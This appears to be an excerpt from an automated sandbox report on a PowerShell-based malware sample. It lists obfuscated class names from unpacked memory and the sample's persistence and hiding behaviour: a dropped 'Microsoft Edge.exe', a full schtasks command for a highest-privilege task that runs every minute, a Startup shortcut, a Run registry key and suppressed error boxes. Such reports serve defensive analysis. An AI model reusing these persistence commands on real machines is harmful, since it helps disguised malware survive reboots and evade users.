                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, BDWSQN6Hp8X5gTSet0rxbg6KqNmPuWcMNwjVY.csHigh entropy of concatenated method names: 'eL7GGk4WmM61PdLSqbWG6YaHw12QxrHEHRgRgiSNLixKrwoya4NFDehQIlvxCfUNf76spf', 'eMdugtuhDDIkYlHpB36yWFHw6S4R9GHmkcTchebZLMRuh8JBjR2012fNbluBjRxlVxyfF4', 'RNWGVlnmrKi33941uDnDiqbRFbsoyVGogBJEDfTPVE3NQ4Fci1jQsCiBraORHvmRxtpkmG', '_7Om2SWm8JgaAwqtNXmKpladDmCqzdVVvSp11NVwLsiGu9a9nl1WLsDgr7qDUGddhk7TWrE', 'Wi78qkJOcuANDZZuqbBXB8KwjNkIjDJH1VkVPtWSEO4VECSymOaswpV9c53eS7w1blL58N', 'RuDYr1lymxLAoYXTWHP87PTaxFuiLsQ6D0qQTfmfUd3cMOy3VZgogP5OBL4Z57jBU1UlUq', 'ftOHMZKLoVAe7oDdzgNSaZvrXV580c4NwGz2KbPqhx27vLL95nrsm81NGFClQphOA4dakF', 'ziMnS3tk6l9H8XsDVwDEiN9tyDE0rSzjlvngUw50zBKS4OjAry8X2OeqiWB8HBBofzIuky', 'KBzESIwB2oiI6nX30ofSHPRGKKDQkymwtjaalyYA0cDZEMxYlfhejGm5rufxey1rHfXD9u', 'HZekXdutkMztJEA163sUjMqw5aGFLXTr5oZ5qYVieqCjGzdISUmDGWBcdZTN1J8heQepyU'
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, k1suxEVuuBq3uWARImKRM7jW1zxTLtycPgDPKADkTu0nFVzLrl14d7C.csHigh entropy of concatenated method names: '_4eWf4545ZU1tgtWWWhcREjqUfImHM3dyPfldqeoLXemLSM7qwNSEkXP', 'GraRatYUTE9yfGHACWkJIlQXjnps0c32dIDmkaa7Pr', 'WmQ4nBaaivvYcWOvApIJkedMuhW1Fz2agQ7jT4v2nm', 'MAzXrsc7D4DfLA0Kc8S4b5vlwrN2RnptRWldFM7VTf', '_2NQQP5TEFDZV68sSo9Cg04N8x0q0TK7U46s3WK9ixD'
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.csHigh entropy of concatenated method names: 'ti958FclD7HNWrxxleSoVDklxvel4jZRkAfXjVG9miQfFN97Z1QLjuj', 'HPUoDK9TKpIvQ42reUKN2ZWlw0bIjVDG5r5BO7J989S0ePsFBqQXEHq', 'Dy7mTPZBgrtcwn4Z3xhHsnHOXq6R3nM7rZbcwP6iN5RHws8R9ui67kd', '_6XXsuqSY9kFaohQzDsDrKq0Ic4sdn9VI2K1SpJKrkND0poFSO8aLK52', 'igMSrGpMcQjdyU4YAoQiWnMPoGOknH5NESOutlqRcmBM8bAy0gKHOX7', 'IfRfJAnni7tRVdVtkNPRJHAicIjFyYPflCLtVkTQXmiKVajUbrLftRw', 'b8IXHDSMH6sauRZizKs41KuHEqWGDQ88Cllv4V8Rsw9uI3KxuRehYHw', '_0lCoLd33rR5k2scs177leXw7gqonkOsAdpavznErARjYKzyoh6yKRlR', 'JQKvBLKxqhCZaST9GXJyYndKTkyFU6YRPQ3fr9yngwVIfOTHrYrx2tc', '_8bdScf90EYLyMyuTtfgt7SSdk6GrrIy4fQiXyhDFtT5dkzGLJiq6MQt'
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, WPO8cj59ZAjx6H3U2v8fgOh2JU1l11.csHigh entropy of concatenated method names: 'hAe27nBslIFqJ9767VpQbeEA2XUlrz', 'DJ0PN04gNJ4QhuQPeIsi5qpAp7hrOG', '_8ceYvS1XiC32T9AsSWP882f33E565P', 'mGq7fHjVGEORxcw1isQeksizMvH35F', 'Imxr6Vv5o3AgXntpppLl55SX5W1iolloNEKZtjWmBl', 'zdlX4f8Drsgg3aV50U8Np95N2z9iwjo4xFAVTNYOpE', 'gBreLQFZfQqXsDNS7PmFPpKaMW9FKOF6KlDd4QonPd', 'VzpOVKBtVZuAp2MarFXC6S1qJ0B53aLrZkPyOkwkDu', 'oiY8jROCvdMJP510YUa3GrOaACu5UFE6RdxSLeNcxU', 'rPBWDCNs7PUk8C7LI933NUOl2cpddakgpAGMHkdOsY'
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, 0N3IUG0d4nqzF3nuXpkyWy78LaCw1e8cLjT9k.csHigh entropy of concatenated method names: 'LuWWNg3qRSsK4WDno9H63X8mfplBEOOOVlYIE', '_9YE4oSmMDwSsoPoIhcFgu2KyKx0gu2c5rdQQP', 'bEq3vOxvfFFHk7j13z99FrJk4Bi0XsYksg751', 'KcAVckBwKnOm6ATYrXSpt3FrMiVz5dkWxEojg', 'UnIxhKbi6DWTCWYIgRySX9cO7icu6NkiCc3EU', '_1FvIjZfcsDTU84RevArzkly2ufADWo339SNnv', '_4nJx9drhQr1ZTJ2IkRniOVueP5iG4ryHvCfM2', '_06rXsYRKOp4racDrxgSfaVPpHtVsLB7KCJYQY', '_4IrI0Nk122gE6brDP7dPcc9eeRbCqWMInxpG7', 'zhl5W1uH5Ix305KZKuGwoUp4YKSJnoDPB4cet'
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, cDzX4sgWQV0wXOebiW4iQliUCQkauWDv11NNFBbnrPHaqnKnpniwDRl.csHigh entropy of concatenated method names: 'zDLhASyZx1ZrmQcvGVRQizBujklfqTIfhUlfzrNW1uEXQ6zZQgIH5yS', '_0cEa2S5ueTGYFN8qJmZiGNgLogzFmfAWZtVJnDHF15GCY7Se96rTAs9', 'd6seVejjXGbEX8P2E1AnlijIuapRWQAvggYvKjJXscEkEKfWH9YjE7y', 'shiYvcVsXoBZV5Y2fA5XffJWt4GTHFWR1bJREey5P8', 'NaIkQbTSEVjFPwRKb6V2T587nyU9ioV1WxAx6rZPv9', 'odUe3GcOLGtC1isEJqTab7CBmdCps5Vchy19zFU2KL', 'GFHdoQOzdHBALbIjHfCyMhVUPc0uwMZOYhTQTlR9LC', 'QOeuvYjrIkfheQDgUzbTZ5mXnVfHgpDkb6l9APKfiQ', 'nrLuGmsx9RXKBxGRuTfdyXaulpZjAVAZUv8lzhBa32', 'rbQgeSQDU0DGIcXNAbBCpELPkBqUFXloECuZTObZug'
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, VlNtKBcw43i9rBoZf8Mn4P5ZVPZugU.csHigh entropy of concatenated method names: 'JQduDOgmZEW1uXRs2afkK6TpFM9CiA', '_5kLqRWwqwa9mXrdyksJFYylF0YbZWW', '_2Xz9BanSq17LcZOi3SkDlcIwizEaRh', 'hFFuWkcOXEt0xpok3a7TxEEaHHhbdf', 'jEq51FsNiNX7e6cAZhZ3jf6EJedMfR', 'o20fY8Kmj0WdxSjvaiMCQJTCOsArb7', 'pa6N02WH7WrxugIGBDxiZrAvGRBf6y', 'vupXX34kVzSGOhdYm3LmLQ505IxekY', 'bndcAgtc6anf1VqYuvNBmJJMxcq406', 'rDztqxUu1KF68CrhZXe4ikcS5lgAeJ'
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, ZbFOAZuJjnvcc2qnLIW7HYwda38W4Te5ERUSmngaMZktNmgkTlz5J1n6NpXOCO1703omqATISYj8dgrM8FJUgOaH00Gg40t.csHigh entropy of concatenated method names: 'fo4qcB7N7kdczlGaxA3uvZvCLLaAOKKzGtRPU8LtGnQPirV8sdOvQfBXwSCXVrGKLmfE5xvlL5Xnwa0WGF', 'i5iKsb8F3ZaGBQ0MqqvogD1ddC5eBuBxwMlHU2FEBXtFU2fQDnNKBu1ek0nxcl0XEYQLYistFWrPmy9Pug', '_8oHgBVxKKYKXuhK9576xePYYFqw0Q5s1KJyZgz0hVzarEMJNq6IpErslRPiBJStdpEfaC6x2lzLqMx2nQo', 'PTeW6Ap4rKsQ2v1j0kg5Xk9oqt9RTQciJ9IZezjCbwnqbpxgPlgzY2Otb3fFk6o4tIDh5yqku4qqwcy5Up'
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, GrXY7exn82kPguFyRBu66RyjvsKLK2.csHigh entropy of concatenated method names: 'rUCfwIVbUpfq9s6AlUIrhqGCR4K9bY', 'jClU5g5iaCMQApCu3hESco5TWbT5Ly', 'ukWH9gaPLJLg2e4EpcV8N4LsAIMO3Y', 'GVQUJSH9vlrSutl0y4YdqTmHmZFucHusfxaZ7XiaHQ7W7JcnvEf9nWgIVW6G', 'UcKDlXJNXFvMuIatoloVTpo50HqbdJibnzzxHS2ChiGDtE1IzjmPLNO94xtX', 'jvpkgGYj238GYbe8KDQgfHxYFETx0N2LlaRySwwiCY7Et8i0Eovldk8vXggq', 'JRcqMP09Bz74VfASQBmymVqt7OhlccNfF3Sv7ZWJB45YVqlkghobKFZr8JLu', 'qyfLHUDfNZ9FjsO1UbiwzpWIZcZY2UN51FnrvC6v9L2qAThrHuHA1D0ctfCB', 'JWgIan9FvzUj7vCSdEp4NqjVK1Feg3gAczdPJMnBZOltvEp1DVdRlX6FVUgC', 'RrvdedN8SfJDj6XvyFZ1R4OoQjM1FwISJ9rI5HbGjnDzodQaWoSpG7Jp4ys4'
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, ECBVJibPxIU3tYVxJLBv.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'wRs5g03nFBy5wTxfqv6X6rzX4O5kwqP4OAIkxxk6u3IgEI0h2DK2OIIpaXZjoDrOnQ1H9JAPYRCgARXpcJ', 'wEWzderkHJHrETCjdzz8NJmiXdR0aMFjVQ9umbBWKJG3A4hzQaUDL5m5HHQFJLVouKWqfZWjIu1UVXYur9', 'sbAmWHQ677QPPMT1cb1lfARhlvluG2nlwpbkN60VOiEysyt0sTrVFc4QByGzm1OPZgNQ2mHwx7bhuYjyOj', 'DrezBfB4wgLeK9KOhp47wCHLT6H8d0jF7FfxaomUDjsQRIG3XL9uVaZmIqtokXZTGQti91mhmHcJ1qKCoi'
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, BJNwaVkO5FCFM8w6nPi55tsbOB35gOWEyplTYbX7JPMAzS9yB9GN830.csHigh entropy of concatenated method names: 'GBDkIcAhQs4O48EUtXDgPx2eFhmSuIrQdw4IwcUHiYfsTFNGza4mmF588yVJZ6mqSWA3UQNYU769XZ4Mh0qGL6f', '_32hdsPC8tryyS1wcsUDi5JH4jMLKtG0UiHuCQGFfN6UkLfPSFd7EAMPuWgYKi2InaqbAqkiTqLw7l1iy2ePCjqM', 'OXNgP2A11W1g6AGptKmTPninAr4QdkYtBf3scrMGJke9VN98Vpj8NdkLUxnqnZbE5BefxB2PzWZk20oDd4ud6T6', 'd9qCjNBaKgoaTBMnNROKIh22Qr813mRq856K8IIOPzzBglRvEGAntkRd52iUqVTadHZlT6yvQvTMWpri9eZBqpB', '_5j4pmFs2SUvChSSLqfKhtx84vXKV0Hx4WuLv0rkZAyxcIAaYLiI8r2MEZjfah3TF47BqUEze5YJMuQN8t8NJ3c0', 'LwDvmewtKVfLL185OUc5FuD8ZlPrtnhlksbiBmdhFVb739BV0z7Qr1eQYIUShSCcLJIhyauzEugQQe5VrRJeqyJ', 'iPVzbYCu8PSeGv7djCSJujbWMtYVP3xFh0exhX1lzQChKqst6DFSXVguawjGU8ZUqHkHmTOMKCEku4aKbzkUGuE', 'UmfglR2904S6SoXojQZcbqHwbeEFuVp4gYJlOHYTdJUKHTRg6s7Ay6JohOEhR6wGEHLaIm53GF1iQRGidL3Qkn8', 'caLg8TjhKPg1UQHSpqEGcEDtrakLIqQPp2HggYQcAbqCfLknyuZHW1sOR0Wt8J84R4WWniJrDTcABeiCaudZ8XB', '_7SqQy0A3OzQzhiWT2b7XwPmxm8WlfYwIoGS69aCREoOWEvAu2SmHJh9bmpWLVuH74u6DEryUCgCjUpEP1WhE0Mr'
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, 84N5xNbP3Ka7hRYxGvBwVNzODlilcb.csHigh entropy of concatenated method names: 'EE55zVWbaotorZUhDs1J9mOWaiInNX', 'e8J7Wial6jQu1b23oySpTcqpCWT2G3VdU1mu2AAMOW5xDxjUUFJKW1V47RfBUwG3y5qpnq95YI', 't8hWb2jb9Z1hGZmujetevhyoR6vReUCD4fAO7kMMot90TWfeBpW1iKm2At7fLrbQHJveIAX220', 'GZc126Sz9hSbIAS6RYVgZkp0cwN1CVCuPhb9HSO7DUl04YnjIkHrUp4B6DgFYmUrNmKTTzNChY', 'dL9iAkTEac7mfgRnD3s0LA3z3WIoLTHKP5KlKNX7xmp2JTnt8cD9911DjZ91zoRLqiUV233WVC'
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, BDWSQN6Hp8X5gTSet0rxbg6KqNmPuWcMNwjVY.csHigh entropy of concatenated method names: 'eL7GGk4WmM61PdLSqbWG6YaHw12QxrHEHRgRgiSNLixKrwoya4NFDehQIlvxCfUNf76spf', 'eMdugtuhDDIkYlHpB36yWFHw6S4R9GHmkcTchebZLMRuh8JBjR2012fNbluBjRxlVxyfF4', 'RNWGVlnmrKi33941uDnDiqbRFbsoyVGogBJEDfTPVE3NQ4Fci1jQsCiBraORHvmRxtpkmG', '_7Om2SWm8JgaAwqtNXmKpladDmCqzdVVvSp11NVwLsiGu9a9nl1WLsDgr7qDUGddhk7TWrE', 'Wi78qkJOcuANDZZuqbBXB8KwjNkIjDJH1VkVPtWSEO4VECSymOaswpV9c53eS7w1blL58N', 'RuDYr1lymxLAoYXTWHP87PTaxFuiLsQ6D0qQTfmfUd3cMOy3VZgogP5OBL4Z57jBU1UlUq', 'ftOHMZKLoVAe7oDdzgNSaZvrXV580c4NwGz2KbPqhx27vLL95nrsm81NGFClQphOA4dakF', 'ziMnS3tk6l9H8XsDVwDEiN9tyDE0rSzjlvngUw50zBKS4OjAry8X2OeqiWB8HBBofzIuky', 'KBzESIwB2oiI6nX30ofSHPRGKKDQkymwtjaalyYA0cDZEMxYlfhejGm5rufxey1rHfXD9u', 'HZekXdutkMztJEA163sUjMqw5aGFLXTr5oZ5qYVieqCjGzdISUmDGWBcdZTN1J8heQepyU'
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, k1suxEVuuBq3uWARImKRM7jW1zxTLtycPgDPKADkTu0nFVzLrl14d7C.csHigh entropy of concatenated method names: '_4eWf4545ZU1tgtWWWhcREjqUfImHM3dyPfldqeoLXemLSM7qwNSEkXP', 'GraRatYUTE9yfGHACWkJIlQXjnps0c32dIDmkaa7Pr', 'WmQ4nBaaivvYcWOvApIJkedMuhW1Fz2agQ7jT4v2nm', 'MAzXrsc7D4DfLA0Kc8S4b5vlwrN2RnptRWldFM7VTf', '_2NQQP5TEFDZV68sSo9Cg04N8x0q0TK7U46s3WK9ixD'
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.csHigh entropy of concatenated method names: 'ti958FclD7HNWrxxleSoVDklxvel4jZRkAfXjVG9miQfFN97Z1QLjuj', 'HPUoDK9TKpIvQ42reUKN2ZWlw0bIjVDG5r5BO7J989S0ePsFBqQXEHq', 'Dy7mTPZBgrtcwn4Z3xhHsnHOXq6R3nM7rZbcwP6iN5RHws8R9ui67kd', '_6XXsuqSY9kFaohQzDsDrKq0Ic4sdn9VI2K1SpJKrkND0poFSO8aLK52', 'igMSrGpMcQjdyU4YAoQiWnMPoGOknH5NESOutlqRcmBM8bAy0gKHOX7', 'IfRfJAnni7tRVdVtkNPRJHAicIjFyYPflCLtVkTQXmiKVajUbrLftRw', 'b8IXHDSMH6sauRZizKs41KuHEqWGDQ88Cllv4V8Rsw9uI3KxuRehYHw', '_0lCoLd33rR5k2scs177leXw7gqonkOsAdpavznErARjYKzyoh6yKRlR', 'JQKvBLKxqhCZaST9GXJyYndKTkyFU6YRPQ3fr9yngwVIfOTHrYrx2tc', '_8bdScf90EYLyMyuTtfgt7SSdk6GrrIy4fQiXyhDFtT5dkzGLJiq6MQt'
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, WPO8cj59ZAjx6H3U2v8fgOh2JU1l11.csHigh entropy of concatenated method names: 'hAe27nBslIFqJ9767VpQbeEA2XUlrz', 'DJ0PN04gNJ4QhuQPeIsi5qpAp7hrOG', '_8ceYvS1XiC32T9AsSWP882f33E565P', 'mGq7fHjVGEORxcw1isQeksizMvH35F', 'Imxr6Vv5o3AgXntpppLl55SX5W1iolloNEKZtjWmBl', 'zdlX4f8Drsgg3aV50U8Np95N2z9iwjo4xFAVTNYOpE', 'gBreLQFZfQqXsDNS7PmFPpKaMW9FKOF6KlDd4QonPd', 'VzpOVKBtVZuAp2MarFXC6S1qJ0B53aLrZkPyOkwkDu', 'oiY8jROCvdMJP510YUa3GrOaACu5UFE6RdxSLeNcxU', 'rPBWDCNs7PUk8C7LI933NUOl2cpddakgpAGMHkdOsY'
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, 0N3IUG0d4nqzF3nuXpkyWy78LaCw1e8cLjT9k.csHigh entropy of concatenated method names: 'LuWWNg3qRSsK4WDno9H63X8mfplBEOOOVlYIE', '_9YE4oSmMDwSsoPoIhcFgu2KyKx0gu2c5rdQQP', 'bEq3vOxvfFFHk7j13z99FrJk4Bi0XsYksg751', 'KcAVckBwKnOm6ATYrXSpt3FrMiVz5dkWxEojg', 'UnIxhKbi6DWTCWYIgRySX9cO7icu6NkiCc3EU', '_1FvIjZfcsDTU84RevArzkly2ufADWo339SNnv', '_4nJx9drhQr1ZTJ2IkRniOVueP5iG4ryHvCfM2', '_06rXsYRKOp4racDrxgSfaVPpHtVsLB7KCJYQY', '_4IrI0Nk122gE6brDP7dPcc9eeRbCqWMInxpG7', 'zhl5W1uH5Ix305KZKuGwoUp4YKSJnoDPB4cet'
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, cDzX4sgWQV0wXOebiW4iQliUCQkauWDv11NNFBbnrPHaqnKnpniwDRl.csHigh entropy of concatenated method names: 'zDLhASyZx1ZrmQcvGVRQizBujklfqTIfhUlfzrNW1uEXQ6zZQgIH5yS', '_0cEa2S5ueTGYFN8qJmZiGNgLogzFmfAWZtVJnDHF15GCY7Se96rTAs9', 'd6seVejjXGbEX8P2E1AnlijIuapRWQAvggYvKjJXscEkEKfWH9YjE7y', 'shiYvcVsXoBZV5Y2fA5XffJWt4GTHFWR1bJREey5P8', 'NaIkQbTSEVjFPwRKb6V2T587nyU9ioV1WxAx6rZPv9', 'odUe3GcOLGtC1isEJqTab7CBmdCps5Vchy19zFU2KL', 'GFHdoQOzdHBALbIjHfCyMhVUPc0uwMZOYhTQTlR9LC', 'QOeuvYjrIkfheQDgUzbTZ5mXnVfHgpDkb6l9APKfiQ', 'nrLuGmsx9RXKBxGRuTfdyXaulpZjAVAZUv8lzhBa32', 'rbQgeSQDU0DGIcXNAbBCpELPkBqUFXloECuZTObZug'
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, VlNtKBcw43i9rBoZf8Mn4P5ZVPZugU.csHigh entropy of concatenated method names: 'JQduDOgmZEW1uXRs2afkK6TpFM9CiA', '_5kLqRWwqwa9mXrdyksJFYylF0YbZWW', '_2Xz9BanSq17LcZOi3SkDlcIwizEaRh', 'hFFuWkcOXEt0xpok3a7TxEEaHHhbdf', 'jEq51FsNiNX7e6cAZhZ3jf6EJedMfR', 'o20fY8Kmj0WdxSjvaiMCQJTCOsArb7', 'pa6N02WH7WrxugIGBDxiZrAvGRBf6y', 'vupXX34kVzSGOhdYm3LmLQ505IxekY', 'bndcAgtc6anf1VqYuvNBmJJMxcq406', 'rDztqxUu1KF68CrhZXe4ikcS5lgAeJ'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft Edge.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Roaming\Microsoft Edge.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnkJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnkJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft EdgeJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft EdgeJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
